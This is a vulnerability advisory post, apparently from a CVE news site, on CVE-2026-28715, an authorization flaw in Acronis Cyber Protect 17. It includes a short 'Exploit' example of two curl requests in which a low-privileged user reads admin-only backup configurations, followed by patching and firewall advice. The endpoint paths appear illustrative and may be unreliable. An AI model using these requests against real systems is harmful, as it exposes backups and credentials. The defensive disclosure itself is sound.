Acronis Cyber Protect, Improper Authorization, CVE-2026-28715 (MEDIUM)

Listen to this Post

CVE-2026-28715 is a medium-severity vulnerability affecting Acronis Cyber Protect 17 on Linux and Windows platforms before build 41186. The issue stems from improper authorization checks (CWE-863), allowing an authenticated attacker to exploit the flaw over a network without user interaction. Due to missing or incorrect validation of user permissions, an attacker with low privileges can send specially crafted requests to the software, tricking it into disclosing sensitive information that should be restricted. The CVSS vector (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) highlights the attack is network-based with low complexity, requiring only low-level privileges. This leads to a high impact on confidentiality, meaning critical data such as system backups, credentials, or configuration files could be exposed. The vulnerability is present in the core components of Acronis Cyber Protect 17, and exploitation does not require any special techniques, making it a significant risk for unpatched systems. Acronis has addressed this in build 41186, urging users to update immediately to prevent potential data breaches.

dailycve form:

Platform: Acronis Cyber Protect
Version: < build 41186
Vulnerability : Improper Authorization
Severity: 6.5 MEDIUM
date: March 5, 2026

Prediction: Patched in build 41186

What Undercode Say:

Analytics

The vulnerability is reachable by an authenticated user via the network, indicating the attack surface is exposed services. The lack of user interaction makes it ideal for automated exploitation. The high confidentiality impact without affecting integrity or availability suggests the flaw lies in data access functions.

Exploit:

Example: Exploiting improper authorization to read sensitive files
This assumes a vulnerable Acronis Cyber Protect 17 instance at <build 41186
Attacker has low-privileged credentials
Step 1: Authenticate to the Acronis management API
curl -k -X POST https://target.example.com/api/iam/login \
-H "Content-Type: application/json" \
-d '{"username": "attacker@lowpriv", "password": "password123"}' \
-c cookies.txt
Step 2: Attempt to access a protected endpoint intended for admins
The vulnerable software fails to check if the authenticated user is an admin
curl -k -X GET https://target.example.com/api/backup/configs \
-H "Content-Type: application/json" \
-b cookies.txt
If successful, the response will contain sensitive backup configurations
which should only be accessible by administrators.

Protection from this CVE

1. Update Immediately: Upgrade Acronis Cyber Protect 17 to build 41186 or later. The patch corrects the missing authorization checks .

Check current build on Linux
sudo acronis_agent_cli --version | grep "Build"
If build is less than 41186, update using the official package manager
sudo apt-get update && sudo apt-get install --only-upgrade acronis-cyber-protect For Debian/Ubuntu
Or for Windows, use the Acronis Console or download the patch from the official site.

2. Restrict Network Access: Implement strict firewall rules to limit access to the Acronis management interface only to trusted admin networks and hosts.

Example iptables rule to restrict access to Acronis port (e.g., 9877)
sudo iptables -A INPUT -p tcp --dport 9877 -s 192.168.1.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 9877 -j DROP

3. Review User Permissions: Conduct an audit of all user accounts and roles within Acronis to ensure the principle of least privilege is followed, minimizing the potential impact if similar flaws are found.

Impact

Successful exploitation of CVE-2026-28715 leads to unauthorized disclosure of sensitive information. This could include backup data, decryption keys, network topology, and other confidential system details. An attacker could use this data to launch further attacks, such as data theft or ransomware deployment. The medium severity rating reflects the requirement for a valid account, though the low complexity makes it an easy target for insider threats or attackers who have already compromised a low-privileged account.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top